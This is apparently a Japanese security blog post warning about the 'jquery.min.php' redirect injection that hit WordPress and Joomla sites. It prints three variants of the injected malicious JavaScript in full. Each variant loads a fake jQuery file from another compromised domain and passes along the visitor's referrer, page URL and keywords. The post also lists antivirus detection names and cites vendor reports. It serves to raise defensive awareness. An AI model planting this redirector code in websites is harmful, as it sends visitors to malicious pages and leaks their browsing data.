リダイレクト改ざんvar a setTimeout jquery.min.php JavaScriptコード
 
{{{ 2016年2月 更新 }}}
 
Google検索などを経由してアクセスしてきたら、別の不正なページへ強制リダイレクトさせる不正なJavaScriptコードが確認されてます! <勝手に強制転送
  • JavaScriptコードの挿入位置
    <head>タグ終端の直前に<script>~</script>タグが挿入される
     
  • 改ざんされる原因?
    WordPress を利用したサイトやブログが侵害されてるので、旧バージョンの脆弱性がらみで第三者がサーバーへ不正アクセス? あるいは管理パスワードがテキトーすぎ?
    Joomla! を利用してるサーバーも侵害されてるらしい
この不正なJavaScriptコードが挿入されるハッキング被害が、日本も含め世界中の正規サイトでたくさん起こってる感じ? <「怪しいサイト」ではないところばかり…
 
侵害されてる一般サイトの改ざん状況
 
イメージ 1
 
イメージ 2
 
イメージ 3
 
挿入される不正なJavaScriptコード
<script>var a='';setTimeout(1);function setCookie(a,b,c){var d=new Date;d.setTime(d.getTime()+60*c*60*1e3);var e="expires="+d.toUTCString();document.cookie=a+"="+b+"; "+e}function getCookie(a){for(var b=a+"=",c=document.cookie.split(";"),d=0;d<c.length;d++){for(var e=c[d];" "==e.charAt(0);)e=e.substring(1);if(0==e.indexOf(b))return e.substring(b.length,e.length)}return null}null==getCookie("__cfgoid")&&(setCookie("__cfgoid",1,1),1==getCookie("__cfgoid")&&(setCookie("__cfgoid",2,1),document.write('<script type="text/javascript" src="' + 'http://[別の侵害さたサイトのドメイン名]/js/jquery.min.php' + '?key=**' + '&utm_campaign=' + '*****' + '&utm_source=' + window.location.host + '&utm_medium=' + '&utm_content=' + window.location + '&utm_term=' + encodeURIComponent(((k=(function(){var keywords = '';var metas = document.getElementsByTagName('meta');if (metas) {for (var x=0,y=metas.length; x<y; x++) {if (metas[x].name.toLowerCase() == "keywords") {keywords += metas[x].content;}}}return keywords !== '' ? keywords : null;})())==null?(v=window.location.search.match(/utm_term=([^&]+)/))==null?(t=document.title)==null?'':t:v[1]:k)) + '&se_referrer=' + encodeURIComponent(document.referrer) + '"><' + '/script>')));</script>
</head>
<body>
<script>var a=''; setTimeout(10); var default_keyword = encodeURIComponent(document.title); var se_referrer = encodeURIComponent(document.referrer); var host = encodeURIComponent(window.location.host); var base = "http://[別の侵害さたサイトのドメイン名]/js/jquery.min.php"; var n_url = base + "?default_keyword=" + default_keyword + "&se_referrer=" + se_referrer + "&source=" + host; var f_url = base + "?c_utt=snt2014&c_utm=" + encodeURIComponent(n_url); if (default_keyword !== null && default_keyword !== '' && se_referrer !== null && se_referrer !== ''){document.write('<script type="text/javascript" src="' + f_url + '">' + '<' + '/script>');}</script>
</head>
<body>
<script>var a='';setTimeout(10);if(document.referrer.indexOf(location.protocol+"//"+location.host)!==0||document.referrer!==undefined||document.referrer!==''||document.referrer!==null){document.write('<script type="text/javascript" src="http://[別の侵害さたサイトのドメイン名]/js/jquery.min.php?c_utt=G91825&c_utm='+encodeURIComponent('http://[別の侵害さたサイトのドメイン名]/js/jquery.min.php'+'?'+'default_keyword='+encodeURIComponent(((k=(function(){var keywords='';var metas=document.getElementsByTagName('meta');if(metas){for(var x=0,y=metas.length;x<y;x++){if(metas[x].name.toLowerCase()=="keywords"){keywords+=metas[x].content;}}}return keywords!==''?keywords:null;})())==null?(v=window.location.search.match(/utm_term=([^&]+)/))==null?(t=document.title)==null?'':t:v[1]:k))+'&se_referrer='+encodeURIComponent(document.referrer)+'&source='+encodeURIComponent(window.location.host))+'"><'+'/script>');}</script>
</head>
<body>
【ウイルス検出名】
Avast JS:Injection-A JS:Injection-I
AVG JS/Redir
Avira HTML/Infected.WebPage.Gen6 HTML/ExpKit.Gen2
ESET JS/TrojanDownloader.FakejQuery.A
McAfee JS/Redirector.db
Microsoft Trojan:JS/Redirector.QE Trojan:JS/Redirector.QD
Sophos Troj/JSRedir-RX
 
別ドメインに設置された『 ~/js/jquery.min.php 』を読み込むようになっていて正規のJavaScriptライブラリ jQuery と似せたファイル名で正規の処理と思い込ませようとしてますかい。
 
jQuery.min.php Malware Affects Thousands of Websites - Sucuri
https://blog.sucuri.net/2015/11/jquery-min-php-malware-affects-thousands-of-websites.html
 
大量インジェクションにより、全世界で数千の Web サイトが感染 Web Attack: Mass Injection Website 19 | Symantec
http://www.symantec.com/connect/blogs/web-11
関連するブログ記事